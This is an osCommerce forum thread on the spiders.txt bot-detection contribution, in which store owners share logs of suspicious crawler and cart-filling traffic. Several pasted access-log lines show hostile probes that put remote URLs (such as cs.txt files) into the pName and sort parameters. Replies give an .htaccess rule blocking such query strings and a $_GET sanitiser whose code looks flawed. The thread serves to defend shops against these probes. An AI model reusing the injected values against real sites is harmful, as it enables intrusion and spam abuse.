imusorka Posted August 18, 2007 Share Posted August 18, 2007 Not really. I just figure it's a lot more data to read and loop through on every page access. Thanks for the reply. I've also a question about bot names. The readme says: "For example, "ebot" matches Googlebot, "nbot" matches msnbot." Does it mean that these shortened names are now commonly understood by SEs upon spidering? Quote Link to comment Share on other sites More sharing options...
stevel Posted August 18, 2007 Author Share Posted August 18, 2007 No. The purpose of spiders.txt is for your osCommerce store to recognize when a spider is visiting so that it won't be assigned a session. There is no need nor attempt to identify which particular spider is visiting. For example, lots of spiders have the string "crawl" in their user agent (may show as Crawler, etc.) The string "crawl" matches all of them. Similarly, a number of spiders, including Googlebot, have the string "ebot", and non-spider visitors never (we hope) do. Therefore, any user agent string containing "ebot" as a substring is deemed a spider.  The search engines do not ever look at this file nor do they care. The only thing that matters is whether or not a spider is identified as a spider and a non-spider isn't incorrectly deemed a spider. The use of substrings is an attempt at optimizing the detection, that is all. Quote Steve  Contributions: Country-State Selector Login Page a la Amazon Protection of Configuration Updated spiders.txt Embed Links with SID in Description Link to comment Share on other sites More sharing options...
imusorka Posted August 18, 2007 Share Posted August 18, 2007 I was confused by the "substring" term when I came across your contribution for the first time, Steve. Thanks for clarifying! Quote Link to comment Share on other sites More sharing options...
Irin Posted November 4, 2007 Share Posted November 4, 2007 Hello, Â I have some IP addresses range visiting just one page at a time at my site and adding random products to a cart for a while already. The last digits of the IP addresses differ every time. 82.99.30.48 - - [04/Nov/2007:13:54:56 -0700] "GET /index.php?cName=accessories&osCsid=0e9cbf6e9135aebf9cefa420dfc61d1a HTTP/1.0" 200 39690 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"82.99.30.73 - - [04/Nov/2007:14:03:28 -0700] "GET /featured_products.php?osCsid=0e9cbf6e9135aebf9cefa420dfc61d1a HTTP/1.0" 200 46332 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 82.99.30.49 - - [04/Nov/2007:14:21:26 -0700] "GET /product_reviews.php?pName=adapt&products_id=317&language=en&osCsid=4bdff8b680aa49b36c5b88b40e7b1e2d HTTP/1.0" 200 36282 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 82.99.30.22 - - [04/Nov/2007:14:29:51 -0700] "GET /my_points_help.php?language=de HTTP/1.0" 200 45147 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 82.99.30.68 - - [04/Nov/2007:14:38:44 -0700] "GET /gv_faq.php?language=de HTTP/1.0" 200 34604 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 82.99.30.11 - - [04/Nov/2007:15:06:48 -0700] "GET /product_info.php?pName=adapt&osCsid=2fb4d1873b22d2bfd890af3d35bf0b54 HTTP/1.0" 200 42446 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 82.99.30.67 - - [04/Nov/2007:15:14:03 -0700] "GET /product_info.php?language=de&pName=control&cName=control&osCsid=2fb4d1873b22d2bfd890af3d35bf0b54 HTTP/1.0" 200 51933 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 82.99.30.4 - - [04/Nov/2007:16:01:19 -0700] "GET /index.php?sort=4a&page=1&cName=modules&osCsid=2fb4d1873b22d2bfd890af3d35bf0b54 HTTP/1.0" 200 42756 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 82.99.30.21 - - [04/Nov/2007:16:32:21 -0700] "GET /product_info.php?pName=kit-20&cName=kits&osCsid=ba8f7b14c77e6d9df1c521d15400e98b HTTP/1.0" 200 45094 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" Â etc... What can I do with it? Â Thanks. Quote Link to comment Share on other sites More sharing options...
beaman Posted December 10, 2007 Share Posted December 10, 2007 I'm having same problem with wide range. I have almost 40 - 50 different visitors with strange IP address. I replaced my old spider.txt file with new one and this start to happen after that. take a look at this. need help  00:08:30 0 Guest 99.228.214.14 03:02:48 03:02:48 / 00:08:29 0 Guest 24.71.223.148 03:02:49 03:02:49 /shopping_cart.php 00:08:21 0 Guest 24.71.223.148 03:02:57 03:02:57 /satellite-accessories-c-51.html 00:07:58 0 Guest 24.71.223.148 03:03:20 03:03:20 /satellite-accessories-satellite-finders-c-51_56.html 00:07:42 0 Guest 24.71.223.148 03:03:36 03:03:36 /font-color0000ffabout-c-59.html 00:07:30 0 Guest 99.228.214.14 03:03:48 03:03:48 /captiveworks-receivers-c-41.html 00:18:09 0 Guest 71.245.29.105 02:53:09 02:56:40 /satellite-accessories-satellite-motors-c-51_57.html 00:02:43 0 Guest 24.71.223.148 03:08:35 03:08:35 /shopping_cart.php 00:02:42 0 Guest 38.113.177.227 03:08:36 03:08:36 /other-electronics-electronics-c-38_37.html 00:00:08 0 Guest 76.64.204.111 03:11:10 03:11:10 / 00:00:38 0 Guest 216.197.133.146 03:10:40 03:10:40 / 00:11:05 0 Guest 142.177.229.37 03:00:13 03:00:13 / 00:10:49 0 Guest 24.71.223.148 03:00:29 03:00:29 /satellite-dishes-c-52.html 00:10:10 0 Guest 24.71.223.148 03:01:08 03:01:08 /captiveworks-receivers-c-41.html 00:09:54 0 Guest 24.71.223.148 03:01:24 03:01:24 /shopping_cart.php?sort=2a 00:09:34 0 Guest 24.71.223.148 03:01:44 03:01:44 /shopping_cart.php 00:09:26 0 Guest 24.71.223.148 03:01:52 03:01:52 /captiveworks-receivers-c-41.html 00:07:00 0 Guest 24.71.223.148 03:04:18 03:04:18 /create_account.php 00:02:01 0 Guest 24.71.223.148 03:09:17 03:09:17 /shopping_cart.php?sort=2a 00:02:17 0 Guest 24.71.223.148 03:09:01 03:09:01 /satellite-dishes-c-52.html 00:05:30 0 Guest 99.228.214.14 03:05:48 03:05:48 /captiveworks-receivers-c-41.html 00:09:06 0 Guest 24.71.223.148 03:02:12 03:02:12 /index.php 00:05:43 0 Guest 67.158.176.139 03:05:35 03:05:35 / 00:55:07 0 Guest 66.249.67.131 02:16:11 02:58:48 /advanced_search_result.php?keywords=digital+cameras&osCsid=7a3e 00:03:00 0 Guest 24.71.223.148 03:08:18 03:08:18 /index.php 00:03:25 0 Guest 24.71.223.148 03:07:53 03:07:53 /create_account.php 00:08:34 0 Guest 65.92.100.150 03:02:44 03:02:44 / 00:03:21 0 Guest 24.71.223.148 03:07:57 03:07:57 /create_account_success.php 00:08:51 0 Guest 24.71.223.148 03:02:27 03:02:27 /products_new.php 00:09:15 0 Guest 24.71.223.148 03:02:03 03:02:03 /shopping_cart.php?sort=2a 00:06:41 0 Guest 99.228.214.14 03:04:37 03:04:37 /captiveworks-receivers-c-41.html 00:14:13 0 Guest 142.177.229.37 02:57:05 02:57:05 /pansat-receivers-c-49.html 00:13:58 0 Guest 142.177.229.37 02:57:20 02:58:45 /advanced_search_result.php?keywords=digital+cameras&osCsid=7a3e 00:04:47 0 Guest 99.228.214.14 03:06:31 03:06:31 /captain-receivers-c-43.html 00:01:39 0 Guest 24.71.223.148 03:09:39 03:09:39 /login.php 00:01:54 0 Guest 38.113.177.227 03:09:24 03:09:24 /captiveworks-cw800s-receiver-p-174.html 00:16:06 0 Guest 142.177.229.37 02:55:12 03:00:07 /index.php?currency=USD&osCsid=8e5b46b96e49fd026113e76b774d8e0f 00:12:15 0 Guest 24.71.223.148 02:59:03 02:59:03 / 00:11:53 0 Guest 65.92.100.150 02:59:25 02:59:25 / 00:11:24 0 Guest 142.177.229.37 02:59:54 02:59:54 /other-electronics-cameras-c-38_28.html 00:11:15 0 Guest 142.177.229.37 03:00:03 03:00:03 /pansat-receivers-c-49.html 00:04:13 0 Guest 24.71.223.148 03:07:05 03:07:05 /create_account.php 00:02:09 0 Guest 38.113.177.227 03:09:09 03:09:09 / 00:10:23 0 Guest 24.71.223.148 03:00:55 03:00:55 /shopping_cart.php?sort=2a Currently there are 44 customers online    please help. this is happening since last 72 hours. everytime I check my who's online I see this with different numbers. Quote Link to comment Share on other sites More sharing options...
webstarter Posted December 18, 2007 Share Posted December 18, 2007 Hi there I've just added the update spiders-large.txt and changed the file as stated to spiders.txt I'm still getting the bots below as you will see from the image any advice ? I'm new to all this so if you are able to explain it to me that would be great. Â Thank You Regards Ian :thumbsup: Quote Link to comment Share on other sites More sharing options...
stevel Posted December 23, 2007 Author Share Posted December 23, 2007 Looks as if my subscription to this topic expired again - sigh...  Ian,  The purpose of spiders.txt is NOT to prevent bots from spidering your site. Rather, it is to ensure that said bots don't get sessions so that they don't include session IDs in the links they index and that they stay out of functions that require a session (such as Add to Cart).  Irina,  The entries you show are (or are pretending to) come from a user browser. I agree that it looks suspicious, but there's nothing that spiders.txt can do for you since the user agent string is that of a normal browser. What you can do is add a DenyFrom entry to your .htaccess file to block accesses from this IP range (82.99.30)  irfan (beaman),  We would need to see the access log entries. A "Who's online" report is not sufficient. I'll comment that many of these look like normal users (cable modem customer, etc.) Quote Steve  Contributions: Country-State Selector Login Page a la Amazon Protection of Configuration Updated spiders.txt Embed Links with SID in Description Link to comment Share on other sites More sharing options...
dsolutions Posted January 8, 2008 Share Posted January 8, 2008 I am seem to be having an issue with "amazonaws" Is this a new spider? I have the most up to date spider file.  Thanks  Evan Quote Link to comment Share on other sites More sharing options...
stevel Posted January 8, 2008 Author Share Posted January 8, 2008 Doesn't seem to be a regular spider. Could be someone writing code based on Amazon Web Services. I will check my logs to see if I have hits from this, but a check of yesterday's log doesn't show anything.  What are you seeing - spider-like activity over many links? Please provide some sample lines from the web access log. Quote Steve  Contributions: Country-State Selector Login Page a la Amazon Protection of Configuration Updated spiders.txt Embed Links with SID in Description Link to comment Share on other sites More sharing options...
dsolutions Posted January 8, 2008 Share Posted January 8, 2008 I am about to block the IP address, but I really dont want too.   Not sure how to provide the web access log, but here is a sample of what I think you want:  /-p-100.html?language=es Http Code: 200 Date: Jan 08 12:39:59 Http Version: HTTP/1.0 Size in Bytes: 15209 Referer: http://www.ganodermacoffee.com/product_inf...products_id=100 Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:[email protected]]   /-p-99.html?language=es Http Code: 200 Date: Jan 08 12:40:12 Http Version: HTTP/1.0 Size in Bytes: 15201 Referer: http://www.ganodermacoffee.com/-p-99.html Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:[email protected]]   /-p-99.html?language=en Http Code: 200 Date: Jan 08 12:40:22 Http Version: HTTP/1.0 Size in Bytes: 15790 Referer: http://www.ganodermacoffee.com/-p-99.html Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:[email protected]]    /-pr-99.html Http Code: 200 Date: Jan 08 12:40:33 Http Version: HTTP/1.0 Size in Bytes: 13829 Referer: http://www.ganodermacoffee.com/-p-99.html Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:[email protected]]    /-p-102.html?language=es Http Code: 200 Date: Jan 08 12:40:47 Http Version: HTTP/1.0 Size in Bytes: 15215 Referer: http://www.ganodermacoffee.com/product_inf...products_id=102 Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:[email protected]]    /-p-102.html?language=en Http Code: 200 Date: Jan 08 12:41:05 Http Version: HTTP/1.0 Size in Bytes: 15843 Referer: http://www.ganodermacoffee.com/product_inf...products_id=102 Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:[email protected]]    -----------------------  01:39:40 Guest ec2-72-44-49-100.z-1.compute-1.amazonaws.com 11:10:13 12:49:53 Gano Coffee Club (Product) Yes Yes Name: Guest  ID: 0  IP Address: 72.44.49.100  User Agent: Mozilla/5.0 (compatible; heritrix/1.12.1 +http://www.page-store.com) [email:[email protected]]  osCsid: 49a31cd29bce4cd3e1e32bc4ff5462e6  ------------------  It seems to just keep cycling through the products and adding 1 to the cart and now it has started to add a second item to the cart for each product.    Referer?: http://www.ganodermacoffee.com/ Quote Link to comment Share on other sites More sharing options...
stevel Posted January 8, 2008 Author Share Posted January 8, 2008 (edited) Ah. This should be blocked by "heritrix" in spiders.txt. Perhaps your store is not configured to use it?  I would feel better if I saw entries from an actual access log. Edited January 8, 2008 by stevel Quote Steve  Contributions: Country-State Selector Login Page a la Amazon Protection of Configuration Updated spiders.txt Embed Links with SID in Description Link to comment Share on other sites More sharing options...
Andreas2003 Posted January 15, 2008 Share Posted January 15, 2008 (edited) Hi Steve, Â got many hits today from "spider5.mail.ru", IP 195.239.211.234. Browser-Identification: "Mail.Ru/1.0" Â Don't know, if you have this little fellow right in your files ? Â Regards Andreas Edited January 15, 2008 by Andreas2003 Quote Link to comment Share on other sites More sharing options...
stevel Posted January 15, 2008 Author Share Posted January 15, 2008 I haven't seen that one yet and can't find any obvious indication of what it is. Quote Steve  Contributions: Country-State Selector Login Page a la Amazon Protection of Configuration Updated spiders.txt Embed Links with SID in Description Link to comment Share on other sites More sharing options...
Irin Posted January 30, 2008 Share Posted January 30, 2008 (edited) I noticed some suspicious activities going on on my web site. It either a spider or a continuous script running. It visits my web site throughout the day, makes one click at a time, and always uses a different IP. It's hard to block it because IP changes all the time. Here is what I have in my access_log: Â 67.68.206.67 - - [30/Jan/2008:05:33:36 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 72027 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" 67.68.206.67 - - [30/Jan/2008:05:34:07 -0700] "GET /index.php?sort=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 48317 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" 70.53.156.125 - - [30/Jan/2008:05:41:44 -0700] "GET /product_info.php?pName=http://laudanskisucksss.chat.ru/placeholder/image? HTTP/1.1" 200 72141 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" 70.53.156.125 - - [30/Jan/2008:05:41:52 -0700] "GET /product_info.php?pName=http://laudanskisucksss.chat.ru/placeholder/image? HTTP/1.1" 200 72170 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" 70.53.156.125 - - [30/Jan/2008:05:42:34 -0700] "GET /index.php?sort=http://laudanskisucksss.chat.ru/placeholder/image? HTTP/1.1" 200 48422 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" 70.53.156.125 - - [30/Jan/2008:05:42:34 -0700] "GET /index.php?sort=http://laudanskisucksss.chat.ru/placeholder/image? HTTP/1.1" 200 48471 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" 124.104.84.192 - - [30/Jan/2008:05:43:32 -0700] "GET /product_info.php?language=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 67772 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)" 124.104.84.192 - - [30/Jan/2008:05:43:45 -0700] "GET /product_info.php?pName=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 66375 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)" 64.231.108.203 - - [30/Jan/2008:05:51:28 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 71998 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" 64.231.108.203 - - [30/Jan/2008:05:51:30 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 72027 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" 64.231.108.203 - - [30/Jan/2008:05:51:30 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 71998 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" 64.231.108.203 - - [30/Jan/2008:05:51:32 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 12945 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" 64.231.108.203 - - [30/Jan/2008:05:52:13 -0700] "GET /index.php?sort=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 48219 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" 64.231.108.203 - - [30/Jan/2008:05:52:13 -0700] "GET /index.php?sort=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 48256 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" 64.231.108.203 - - [30/Jan/2008:05:52:15 -0700] "GET /index.php?sort=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 48399 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" 64.231.108.203 - - [30/Jan/2008:05:52:21 -0700] "GET /index.php?sort=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 12945 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" 69.159.62.217 - - [30/Jan/2008:06:20:32 -0700] "GET /index.php?sort=http://cherrygirl.h18.ru/images/cs.txt? HTTP/1.1" 200 48296 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; pt-BR; rv:1.7.7) Gecko/20050414 Firefox/2.0.5" 124.104.84.192 - - [30/Jan/2008:06:37:02 -0700] "GET /product_info.php?language=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 67776 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)" 124.104.84.192 - - [30/Jan/2008:06:37:17 -0700] "GET /product_info.php?pName=http://amyru.h18.ru/images/cs.txt? HTTP/1.1" 200 66337 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)" 67.68.206.67 - - [30/Jan/2008:07:15:23 -0700] "GET /product_info.php?pName=http://hotraebywka.chat.ru/images/girl? HTTP/1.1" 200 72027 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" Â and so on... Â Can anybody please explain what's going on and if there is something I can do about it? Any help will be appreciated. Thanks. Edited January 30, 2008 by Irin Quote Link to comment Share on other sites More sharing options...
stevel Posted January 30, 2008 Author Share Posted January 30, 2008 It's looking to see if it can use your site for redirecting URLs in spam emails.  If you are not using the "Visit this product's web site" feature, you can do this. Add this code to your .htaccess file:  RewriteEngine On RewriteCond %{QUERY_STRING} :/ [NC] RewriteRule ^ - [F]  If you already have the RewriteEngine line in there, you don't repeat it.  This will cause all attempts to access your site with a URL in the parameters to fail. Quote Steve  Contributions: Country-State Selector Login Page a la Amazon Protection of Configuration Updated spiders.txt Embed Links with SID in Description Link to comment Share on other sites More sharing options...
Irin Posted January 30, 2008 Share Posted January 30, 2008 It's looking to see if it can use your site for redirecting URLs in spam emails. If you are not using the "Visit this product's web site" feature, you can do this. Add this code to your .htaccess file:  RewriteEngine On RewriteCond %{QUERY_STRING} :/ [NC] RewriteRule ^ - [F]  If you already have the RewriteEngine line in there, you don't repeat it.  This will cause all attempts to access your site with a URL in the parameters to fail. Hi Stevel,  Is this the feature on product_info.php "For more information, please visit this products webpage."? If yes, I do use it. I added your code to my .htaccess file. Do you think it'll prevent the script from running?  Thanks for your help. Quote Link to comment Share on other sites More sharing options...
stevel Posted January 30, 2008 Author Share Posted January 30, 2008 Hi Stevel, Is this the feature on product_info.php "For more information, please visit this products webpage."? If yes, I do use it. I added your code to my .htaccess file. Do you think it'll prevent the script from running?  Thanks for your help.  Yes, that's the feature. You'll probably find that those links stop working. It can be worked around by changing the URL used so that it does not include the "http://" part. Quote Steve  Contributions: Country-State Selector Login Page a la Amazon Protection of Configuration Updated spiders.txt Embed Links with SID in Description Link to comment Share on other sites More sharing options...
Irin Posted January 30, 2008 Share Posted January 30, 2008 Yes, that's the feature. You'll probably find that those links stop working. It can be worked around by changing the URL used so that it does not include the "http://" part. Stevel, Â Thanks a lot for your help. Since I added your code to my .htaccess file, I don't see any more strange URLs accessing my web site. It stopped all the attempts of using my web site for suspicious purposes. The redirect feature also seems to be working fine, the URL used to redirect to the web page is http://myshop.com/redirect.php?action=url&...cts%2Fpage.html. Thanks to you I got this problem sorted. Â Thanks again. Quote Link to comment Share on other sites More sharing options...
stevel Posted January 30, 2008 Author Share Posted January 30, 2008 You're welcome. You should see "403" (Forbidden) errors show up in the log, but you'll see a lot fewer of those over time. You can rest assured that this closes off one possible way for spammers to abuse your site. Quote Steve  Contributions: Country-State Selector Login Page a la Amazon Protection of Configuration Updated spiders.txt Embed Links with SID in Description Link to comment Share on other sites More sharing options...
Irin Posted January 30, 2008 Share Posted January 30, 2008 (edited) You're welcome. You should see "403" (Forbidden) errors show up in the log, but you'll see a lot fewer of those over time. You can rest assured that this closes off one possible way for spammers to abuse your site. Yep, I can see some "403" errors in my log but they are all for these strange URLs. Â 70.51.76.179 - - [30/Jan/2008:12:42:17 -0700] "GET /index.php?sort=http://ninaru.hut2.ru/images/cs.txt? HTTP/1.1" 403 307 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)" 76.67.138.251 - - [30/Jan/2008:12:37:56 -0700] "GET /index.php?sort=http://0xg3458.hub.io/pb.php? HTTP/1.1" 403 307 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)" 76.67.138.251 - - [30/Jan/2008:12:37:05 -0700] "GET /product_info.php?pName=http://0xg3458.hub.io/pb.php? HTTP/1.1" 403 314 "-" "Wget/1.1 (compatible; i486; Linux; RedHat7.3)" 64.229.149.191 - - [30/Jan/2008:12:33:45 -0700] "GET /index.php?sort=http://migirlinme.krovatka.su/index? HTTP/1.1" 403 307 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" Â There are some other URLs are showing up in my log file, may be you know what are those: Â 196.217.86.107 - - [30/Jan/2008:12:53:45 -0700] "GET /osCommerce/images/prod.jpg HTTP/1.1" 301 366 "http://all-patch.org/vb/showthread.php?p=764145#post764145" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; iOpus-I-M; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MEGAUPLOAD 2.0)" 212.76.72.252 - - [30/Jan/2008:12:54:23 -0700] "GET /osCommerce/images/prod.jpg HTTP/1.1" 301 366 "http://www.bramjnet.com/vb3/showthread.php?t=99710" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SIMBAR={7B7C664E-CCE9-11DC-A053-000FB0E14566}; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727)" 212.76.72.252 - - [30/Jan/2008:12:54:24 -0700] "GET /images/prod.jpg HTTP/1.1" 200 9061 "http://www.bramjnet.com/vb3/showthread.php?t=99710" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SIMBAR={7B7C664E-CCE9-11DC-A053-000FB0E14566}; .NET CLR 1.1.4322; InfoPath.2; .NET CLR 2.0.50727)" Â Again, thanks for your help. Edited January 30, 2008 by Irin Quote Link to comment Share on other sites More sharing options...
♥FWR Media Posted January 30, 2008 Share Posted January 30, 2008 (edited) RewriteEngine On RewriteCond %{QUERY_STRING} :/ [NC] RewriteRule ^ - [F]   If you already have the RewriteEngine line in there, you don't repeat it.  This will cause all attempts to access your site with a URL in the parameters to fail.  Using .htaccess really (imo) ought to be a last dirty resort in these cases. After all, we are talking about simply sanitising the $_GET variable. (maybe you $_REQUEST = $_GET + $_POST (after sanitising ofc) like me .. who needs $_COOKIE fer gods sake)  $_GET is often multidimensional so why not use a recursive cleaner, something like ..  $_GET = clean_get__recursive($_GET); function clean_get__recursive($get_var) { $get_var = preg_replace("/[^a-zA-Z0-9 _.-]/i", "", $get_var); // Add the preg_replace to every element. return array_map('clean_get__recursive', $get_var); }  The preg_replace may be too heavy for some but the concept is sound. Edited January 30, 2008 by Babygurgles Quote Ultimate SEO Urls 5 PRO - Multi Language Modern, Powerful SEO Urls  KissMT Dynamic SEO Meta & Canonical Header Tags  KissER Error Handling and Debugging  KissIT Image Thumbnailer  Security Pro - Querystring protection against hackers ( a KISS contribution )  If you found my post useful please click the "Like This" button to the right. Please only PM me for paid work. Link to comment Share on other sites More sharing options...
stevel Posted January 31, 2008 Author Share Posted January 31, 2008 Robert, that's an interesting idea but it doesn't signal to the spammers that they should go away. There's no legitimate purpose to having :/ in a $_GET parameter so the .htaccess takes care of it simply. Quote Steve  Contributions: Country-State Selector Login Page a la Amazon Protection of Configuration Updated spiders.txt Embed Links with SID in Description Link to comment Share on other sites More sharing options...
♥FWR Media Posted January 31, 2008 Share Posted January 31, 2008 (edited) Robert, that's an interesting idea but it doesn't signal to the spammers that they should go away. There's no legitimate purpose to having :/ in a $_GET parameter so the .htaccess takes care of it simply.   Perhaps a nice little error page saying #!@#! off! :D  Anyway .. I'm leading this thread off topic .. back to spiders.txt I think. Edited January 31, 2008 by Babygurgles Quote Ultimate SEO Urls 5 PRO - Multi Language Modern, Powerful SEO Urls  KissMT Dynamic SEO Meta & Canonical Header Tags  KissER Error Handling and Debugging  KissIT Image Thumbnailer  Security Pro - Querystring protection against hackers ( a KISS contribution )  If you found my post useful please click the "Like This" button to the right. Please only PM me for paid work. Link to comment Share on other sites More sharing options...
maxxxie Posted February 3, 2008 Share Posted February 3, 2008 GAH! Livebot BEGONE! Â I'm having hassles with livebot (livebot-65-55-165-14.search.live.com and others) impersonating real customers by using this useragent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322). This bot annoys me because it creates sessions (thereby putting osc session IDs in its index), adds things to the cart (making me excited that someone's about to buy something, then disappointing me when I realise what's going on) and doesn't play nice with spiders.txt. Â Any idea how I can prevent this bot from creating sessions? Â Cheers, Max Quote Link to comment Share on other sites More sharing options...
Bushmaster Posted February 3, 2008 Share Posted February 3, 2008 GAH! Livebot BEGONE! I'm having hassles with livebot (livebot-65-55-165-14.search.live.com and others) impersonating real customers by using this useragent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322). This bot annoys me because it creates sessions (thereby putting osc session IDs in its index), adds things to the cart (making me excited that someone's about to buy something, then disappointing me when I realise what's going on) and doesn't play nice with spiders.txt.  Any idea how I can prevent this bot from creating sessions?  Cheers, Max  If it uses the same IP every time just ban the IP from your site. I belive there is a add on for it or you can use .htaccess. http://tools.dynamicdrive.com/userban/ IP bans are not a 100% remedy and can easly ban a potential customer if not carefull. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.